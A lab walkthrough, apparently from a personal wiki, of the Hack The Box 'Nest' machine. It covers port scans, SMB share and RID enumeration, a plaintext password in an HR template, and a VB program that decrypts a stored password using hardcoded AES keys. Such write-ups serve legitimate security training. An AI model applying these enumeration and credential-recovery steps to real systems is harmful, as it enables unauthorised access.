Nest

From Luniwiki
Jump to: navigation, search

Back

Nest01.png

Port scan

u505@naos:~/HTB/Machines/Nest$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.178
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-12-27 13:46:38 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 4386/tcp on 10.10.10.178 Discovered open port 445/tcp on 10.10.10.178
u505@naos:~/HTB/Machines/Nest$ nmap -sC -sV 10.10.10.178
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 08:46 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.39 seconds

Nmap think that the machine is down. We can force the scan with the parameter -Pn

u505@naos:~/HTB/Machines/Nest$ nmap -Pn -sC -sV nest
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 08:47 EST
Nmap scan report for nest (10.10.10.178)
Host is up (0.038s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?

Host script results: |_clock-skew: 8m02s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-12-27T13:56:20 |_ start_date: 2020-12-27T13:49:40
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.92 seconds

An alternative to the -Pn switch is to use nmap as super user, it will enable the ICMP probing.

Nest02.png

Nmap search for a response on port 80 or 443. But the server doesn't respond (firewall drop?). If the scan is launched with sudo, nmap try a ping too.

Nest03.png

u505@naos:~/HTB/Machines/Nest$ sudo nmap -sC -sV 10.10.10.178
[sudo] password for u505:
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 08:47 EST
Nmap scan report for nest (10.10.10.178)
Host is up (0.038s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?

Host script results: |_clock-skew: 8m02s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-12-27T13:56:05 |_ start_date: 2020-12-27T13:49:40
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 54.52 seconds
u505@naos:~/HTB/Machines/Nest$ sudo nmap -p 445,4386 -sC -sV 10.10.10.178
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-27 09:01 EST
Nmap scan report for nest (10.10.10.178)
Host is up (0.038s latency).

PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? 4386/tcp open unknown | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: | Reporting Service V1.2 | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: | Reporting Service V1.2 | Unrecognised command | Help: | Reporting Service V1.2 | This service allows users to run queries against databases using the legacy HQK format | AVAILABLE COMMANDS --- | LIST | SETDIR <Directory_Name> | RUNQUERY <Query_ID> | DEBUG <Password> |_ HELP <Command> 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port4386-TCP:V=7.91%I=7%D=12/27%Time=5FE893C3%P=x86_64-pc-linux-gnu%r(N SF:ULL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLi SF:nes,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognis SF:ed\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x SF:20V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comm SF:and\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Rep SF:orting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQ SF:K\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21, SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows SF:\x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20t SF:he\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20-- SF:-\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r SF:\nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\ SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCook SF:ie,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSession SF:Req,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos, SF:21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21 SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3 SF:A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x2 SF:0command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\. SF:2\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\ SF:.2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\. SF:2\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\ SF:r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20 SF:Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x SF:20Reporting\x20Service\x20V1\.2\r\n\r\n>");
Host script results: |_clock-skew: 8m02s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-12-27T14:12:15 |_ start_date: 2020-12-27T13:49:40
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 199.13 seconds

The port 4386 seems to have an handmade service.

u505@naos:~/HTB/Machines/Nest$ telnet nest 4386
Trying 10.10.10.178...
Connected to nest.
Escape character is '^]'.

HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> >quit
Was it something I said? Connection closed by foreign host.

Windows shares enumeration

Unauthenticated enumeration

Shares

u505@naos:~/HTB/Machines/Nest$ smbmap -H 10.10.10.178
[+] IP: 10.10.10.178:445        Name: nest
u505@naos:~/HTB/Machines/Nest$ smbmap -u anonymous -H 10.10.10.178
[+] Guest session       IP: 10.10.10.178:445    Name: nest                      
        Disk                                                    Permissions    Comment
        ----                                                    -----------    -------
        ADMIN$                                                  NO ACCESS      Remote Admin
        C$                                                      NO ACCESS      Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS      Remote IPC
        Secure$                                                 NO ACCESS
        Users                                                   READ ONLY

There are 2 shares available unauthenticated.

u505@naos:~/HTB/Machines/Nest$ enum4linux 10.10.10.178

Enum4linux doesn't provide any useful information.

u505@naos:~/HTB/Machines/Nest$ crackmapexec smb 10.10.10.178/32
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)

The OS seems to be a Windows 7, Service Pack 1 or Windows Server 2008 R2, Service Pack 1.

u505@naos:~/HTB/Machines/Nest$ sudo crackmapexec smb 10.10.10.178/32 -u 'u505' -p abc --shares
[sudo] password for u505:
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\u505:abc
SMB         10.10.10.178    445    HTB-NEST         [+] Enumerated shares
SMB         10.10.10.178    445    HTB-NEST         Share           Permissions     Remark
SMB         10.10.10.178    445    HTB-NEST         -----           -----------     ------
SMB         10.10.10.178    445    HTB-NEST         ADMIN$                          Remote Admin
SMB         10.10.10.178    445    HTB-NEST         C$                              Default share
SMB         10.10.10.178    445    HTB-NEST         Data            READ
SMB         10.10.10.178    445    HTB-NEST         IPC$                            Remote IPC
SMB         10.10.10.178    445    HTB-NEST         Secure$
SMB         10.10.10.178    445    HTB-NEST         Users           READ

crackmapexec provides the same shares information.

Users

u505@naos:~/HTB/Machines/Nest$ python3 /opt/utils/impacket/examples/lookupsid.py u505:abc@10.10.10.178
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.178 [*] StringBinding ncacn_np:10.10.10.178[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-3904039239-3573887098-1598508871 500: HTB-NEST\Administrator (SidTypeUser) 501: HTB-NEST\Guest (SidTypeUser) 513: HTB-NEST\None (SidTypeGroup) 1002: HTB-NEST\TempUser (SidTypeUser) 1004: HTB-NEST\C.Smith (SidTypeUser) 1005: HTB-NEST\Service_HQK (SidTypeUser)

3 users and administrator are enumerated.

u505@naos:~/HTB/Machines/Nest$ crackmapexec smb 10.10.10.178/32 -u 'u505' -p abc --rid-brute
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\u505:abc
SMB         10.10.10.178    445    HTB-NEST         [+] Brute forcing RIDs
SMB         10.10.10.178    445    HTB-NEST         500: HTB-NEST\Administrator (SidTypeUser)
SMB         10.10.10.178    445    HTB-NEST         501: HTB-NEST\Guest (SidTypeUser)
SMB         10.10.10.178    445    HTB-NEST         513: HTB-NEST\None (SidTypeGroup)
SMB         10.10.10.178    445    HTB-NEST         1002: HTB-NEST\TempUser (SidTypeUser)
SMB         10.10.10.178    445    HTB-NEST         1004: HTB-NEST\C.Smith (SidTypeUser)
SMB         10.10.10.178    445    HTB-NEST         1005: HTB-NEST\Service_HQK (SidTypeUser)

Crackmapexec provides the same information.

Files enumeration

Mount shares

u505@naos:~/HTB/Machines/Nest$ mkdir -p mnt/data mnt/secure mnt/users
u505@naos:~/HTB/Machines/Nest$ cd mnt/
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/data data
🔐 Password for root@//10.10.10.178/data:  *****
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/users users
🔐 Password for root@//10.10.10.178/users:  *****

Search accessible files

u505@naos:~/HTB/Machines/Nest/mnt$ find . -type f -exec ls -l {} \;
find: ‘./data/IT’: Permission denied
find: ‘./data/Production’: Permission denied
find: ‘./data/Reports’: Permission denied
-rwxr-xr-x 1 root root 48 Aug  5  2019 './data/Shared/Maintenance/Maintenance Alerts.txt'
-rwxr-xr-x 1 root root 425 Aug  7  2019 './data/Shared/Templates/HR/Welcome Email.txt'
find: ‘./users/Administrator’: Permission denied
find: ‘./users/C.Smith’: Permission denied
find: ‘./users/L.Frost’: Permission denied
find: ‘./users/R.Thompson’: Permission denied
find: ‘./users/TempUser’: Permission denied
u505@naos:~/HTB/Machines/Nest/mnt$ cat "./data/Shared/Maintenance/Maintenance Alerts.txt"
There is currently no scheduled maintenance work

In the next file, it seems there are credentials for user TempUser.

u505@naos:~/HTB/Machines/Nest/mnt$ cat "./data/Shared/Templates/HR/Welcome Email.txt"
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.
Username: TempUser Password: welcome2019

Thank you HR

Enumeration with user TempUser

Shares

u505@naos:~/HTB/Machines/Nest/mnt$ smbmap -u TempUser -p welcome2019 -H 10.10.10.178
[+] IP: 10.10.10.178:445        Name: nest
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        Secure$                                                 READ ONLY
        Users                                                   READ ONLY

With the user TempUser the hidden share Secure$ is available.

u505@naos:~/HTB/Machines/Nest/mnt$ sudo crackmapexec smb 10.10.10.178/32 -u TempUser -p welcome2019 --shares
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\TempUser:welcome2019
SMB         10.10.10.178    445    HTB-NEST         [+] Enumerated shares
SMB         10.10.10.178    445    HTB-NEST         Share           Permissions     Remark
SMB         10.10.10.178    445    HTB-NEST         -----           -----------     ------
SMB         10.10.10.178    445    HTB-NEST         ADMIN$                          Remote Admin
SMB         10.10.10.178    445    HTB-NEST         C$                              Default share
SMB         10.10.10.178    445    HTB-NEST         Data            READ
SMB         10.10.10.178    445    HTB-NEST         IPC$                            Remote IPC
SMB         10.10.10.178    445    HTB-NEST         Secure$         READ
SMB         10.10.10.178    445    HTB-NEST         Users           READ

Crackmapexec provides the same information.

Files enumeration

Unmount unauthenticated shares.

u505@naos:~/HTB/Machines/Nest/mnt$ sudo umount data users

Mount shares with TempUser

u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/data data -o "username=TempUser,password=welcome2019"
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/users users -o "username=TempUser,password=welcome2019"
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/secure$ secure -o "username=TempUser,password=welcome2019"
u505@naos:~/HTB/Machines/Nest/mnt$ find . -type f -exec ls -l {} \;
find: ‘./secure/Finance’: Permission denied
find: ‘./secure/HR’: Permission denied
find: ‘./secure/IT’: Permission denied
-rwxr-xr-x 1 root root 246 Aug  3  2019 ./data/IT/Configs/Adobe/editing.xml
-rwxr-xr-x 1 root root 0 Oct 10  2011 ./data/IT/Configs/Adobe/Options.txt
-rwxr-xr-x 1 root root 258 Jan  8  2013 ./data/IT/Configs/Adobe/projects.xml
-rwxr-xr-x 1 root root 1274 Aug  7  2019 ./data/IT/Configs/Adobe/settings.xml
-rwxr-xr-x 1 root root 1369 Jun 11  2003 ./data/IT/Configs/Atlas/Temp.XML
-rwxr-xr-x 1 root root 4598 Mar  3  2012 ./data/IT/Configs/Microsoft/Options.xml
-rwxr-xr-x 1 root root 6451 Aug  7  2019 ./data/IT/Configs/NotepadPlusPlus/config.xml
-rwxr-xr-x 1 root root 2108 Aug  7  2019 ./data/IT/Configs/NotepadPlusPlus/shortcuts.xml
-rwxr-xr-x 1 root root 270 Aug  8  2019 './data/IT/Configs/RU Scanner/RU_config.xml'
-rwxr-xr-x 1 root root 48 Aug  5  2019 './data/Shared/Maintenance/Maintenance Alerts.txt'
-rwxr-xr-x 1 root root 425 Aug  7  2019 './data/Shared/Templates/HR/Welcome Email.txt'
find: ‘./users/Administrator’: Permission denied
find: ‘./users/C.Smith’: Permission denied
find: ‘./users/L.Frost’: Permission denied
find: ‘./users/R.Thompson’: Permission denied
-rwxr-xr-x 1 root root 0 Aug  7  2019 './users/TempUser/New Text Document.txt'

In the NotepadPluPlus file config file, in the history there is a file in the IT/Carl folder.

u505@naos:~/HTB/Machines/Nest/mnt$ tail ./data/IT/Configs/NotepadPlusPlus/config.xml
        <Find name="redeem on" />
        <Find name="192" />
        <Replace name="C_addEvent" />
    </FindHistory>
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
</NotepadPlus>

There is a file RU_config, that seems to contains c.smith credentials to access a LDAP (AD?).

u505@naos:~/HTB/Machines/Nest/mnt$ cat './data/IT/Configs/RU Scanner/RU_config.xml'
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>

But these credentials seem to be encrypted.

u505@naos:~/HTB/Machines/Nest/mnt$ echo fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= | base64 -d | xxd
00000000: 7d31 3301 f603 a33d 58ce 4aa1 4241 fa19  }13....=X.J.BA..
00000010: 0158 2a9d 5763 9866 edb8 ce3f ceb2 6311  .X*.Wc.f...?..c.

When we tried to list the IT folder, it raises a permissions denied, but the subfolder Carl is accessible.

u505@naos:~/HTB/Machines/Nest/mnt$ cd secure/IT/Carl
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ find . -type f -exec ls -l {} \;
-rwxr-xr-x 1 root root 56 Aug  7  2019 ./Docs/ip.txt
-rwxr-xr-x 1 root root 73 Aug  7  2019 ./Docs/mmc.txt
-rwxr-xr-x 1 root root 772 Aug  7  2019 './VB Projects/WIP/RU/RUScanner/ConfigFile.vb'
-rwxr-xr-x 1 root root 279 Aug  7  2019 './VB Projects/WIP/RU/RUScanner/Module1.vb'
-rwxr-xr-x 1 root root 441 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb'
-rwxr-xr-x 1 root root 481 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/Application.myapp'
-rwxr-xr-x 1 root root 1163 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb'
-rwxr-xr-x 1 root root 2776 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb'
-rwxr-xr-x 1 root root 5612 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/Resources.resx'
-rwxr-xr-x 1 root root 2989 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb'
-rwxr-xr-x 1 root root 279 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/My Project/Settings.settings'
-rwxr-xr-x 1 root root 4828 Aug  9  2019 './VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj'
-rwxr-xr-x 1 root root 143 Aug  6  2019 './VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user'
-rwxr-xr-x 1 root root 133 Aug  7  2019 './VB Projects/WIP/RU/RUScanner/SsoIntegration.vb'
-rwxr-xr-x 1 root root 4888 Aug  7  2019 './VB Projects/WIP/RU/RUScanner/Utils.vb'
-rwxr-xr-x 1 root root 871 Aug  6  2019 './VB Projects/WIP/RU/RUScanner.sln'

The file utils.vb contains code with a decryption function.

u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ cat './VB Projects/WIP/RU/RUScanner/Utils.vb'
Imports System.Text
Imports System.Security.Cryptography
Public Class Utils

Public Shared Function GetLogFilePath() As String Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt") End Function



Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
Public Shared Function EncryptString(PlainString As String) As String If String.IsNullOrEmpty(PlainString) Then Return String.Empty Else Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
Public Shared Function Encrypt(ByVal plainText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector) Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue) Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText) Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations) Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8)) Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes) Using memoryStream As New IO.MemoryStream() Using cryptoStream As New CryptoStream(memoryStream, _ encryptor, _ CryptoStreamMode.Write) cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length) cryptoStream.FlushFinalBlock() Dim cipherTextBytes As Byte() = memoryStream.ToArray() memoryStream.Close() cryptoStream.Close() Return Convert.ToBase64String(cipherTextBytes) End Using End Using End Function
Public Shared Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations)
Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC
Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read)
Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length)
memoryStream.Close() cryptoStream.Close()
Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount)
Return plainText End Function





End Class

User Flag

Create VB to decrypt password

Dotnet environment variables

u505@naos:/opt/utils/dotnet$ export DOTNET_ROOT=/opt/utils/dotnet
u505@naos:/opt/utils/dotnet$ export PATH=$PATH:$DOTNET_ROOT

Creation of a console VB project.

u505@naos:~/HTB/Machines/Nest$ mkdir VBu505
u505@naos:~/HTB/Machines/Nest$ cd VBu505
u505@naos:~/HTB/Machines/Nest/VBu505$ dotnet new console -lang vb
The template "Console Application" was created successfully.

Processing post-creation actions... Running 'dotnet restore' on /opt/HTB/Machines/Nest/VBu505/VBu505.vbproj... Determining projects to restore... Restored /opt/HTB/Machines/Nest/VBu505/VBu505.vbproj (in 131 ms).
Restore succeeded.

An update for template pack Microsoft.DotNet.Common.ProjectTemplates.3.1::3.1.10 is available. install command: dotnet new -i Microsoft.DotNet.Common.ProjectTemplates.3.1::5.0.0

Inspired on the source code found previously, I created a decrypt function to decrypt the password.

u505@naos:~/HTB/Machines/Nest/VBu505$ cat Program.vb
Imports System
Imports System.Text
Imports System.Security.Cryptography
Public Class Utils


Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
Public Shared Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations)
Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC
Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read)
Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length)
memoryStream.Close() cryptoStream.Close()
Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount)
Return plainText End Function


End Class
Module Program Sub Main(args As String()) Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")) End Sub End Module

We run the VB

u505@naos:~/HTB/Machines/Nest/VBu505$ dotnet run
xRxRxPANCAK3SxRxRx

Check shares available with user c.smith

The user and password are accepted, the 3 shares are available.

u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ smbmap -u c.smith -p xRxRxPANCAK3SxRxRx -H 10.10.10.178
[+] IP: 10.10.10.178:445        Name: nest
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        Secure$                                                 READ ONLY
        Users                                                   READ ONLY

crackmapexec confirms it too.

u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ sudo crackmapexec smb 10.10.10.178/32 -u c.smith -p xRxRxPANCAK3SxRxRx --shares
[sudo] password for u505:
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\c.smith:xRxRxPANCAK3SxRxRx
SMB         10.10.10.178    445    HTB-NEST         [+] Enumerated shares
SMB         10.10.10.178    445    HTB-NEST         Share           Permissions     Remark
SMB         10.10.10.178    445    HTB-NEST         -----           -----------     ------
SMB         10.10.10.178    445    HTB-NEST         ADMIN$                          Remote Admin
SMB         10.10.10.178    445    HTB-NEST         C$                              Default share
SMB         10.10.10.178    445    HTB-NEST         Data            READ
SMB         10.10.10.178    445    HTB-NEST         IPC$                            Remote IPC
SMB         10.10.10.178    445    HTB-NEST         Secure$         READ
SMB         10.10.10.178    445    HTB-NEST         Users           READ

Files enumeration

Mount shares as c.smith

u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ cd ..
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT$ cd ..
u505@naos:~/HTB/Machines/Nest/mnt/secure$ cd ..
u505@naos:~/HTB/Machines/Nest/mnt$ sudo umount data secure users
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/data data -o "username=c.smith,password=xRxRxPANCAK3SxRxRx"
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/users users -o "username=c.smith,password=xRxRxPANCAK3SxRxRx"
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/secure$ secure -o "username=c.smith,password=xRxRxPANCAK3SxRxRx"

Check files available

u505@naos:~/HTB/Machines/Nest/mnt$ find . -type f -exec ls -l {} \;
find: ‘./secure/Finance’: Permission denied
find: ‘./secure/HR’: Permission denied
find: ‘./secure/IT’: Permission denied
-rwxr-xr-x 1 root root 246 Aug  3  2019 ./data/IT/Configs/Adobe/editing.xml
-rwxr-xr-x 1 root root 0 Oct 10  2011 ./data/IT/Configs/Adobe/Options.txt
-rwxr-xr-x 1 root root 258 Jan  8  2013 ./data/IT/Configs/Adobe/projects.xml
-rwxr-xr-x 1 root root 1274 Aug  7  2019 ./data/IT/Configs/Adobe/settings.xml
-rwxr-xr-x 1 root root 1369 Jun 11  2003 ./data/IT/Configs/Atlas/Temp.XML
-rwxr-xr-x 1 root root 4598 Mar  3  2012 ./data/IT/Configs/Microsoft/Options.xml
-rwxr-xr-x 1 root root 6451 Aug  7  2019 ./data/IT/Configs/NotepadPlusPlus/config.xml
-rwxr-xr-x 1 root root 2108 Aug  7  2019 ./data/IT/Configs/NotepadPlusPlus/shortcuts.xml
-rwxr-xr-x 1 root root 270 Aug  8  2019 './data/IT/Configs/RU Scanner/RU_config.xml'
-rwxr-xr-x 1 root root 48 Aug  5  2019 './data/Shared/Maintenance/Maintenance Alerts.txt'
-rwxr-xr-x 1 root root 425 Aug  7  2019 './data/Shared/Templates/HR/Welcome Email.txt'
find: ‘./users/Administrator’: Permission denied
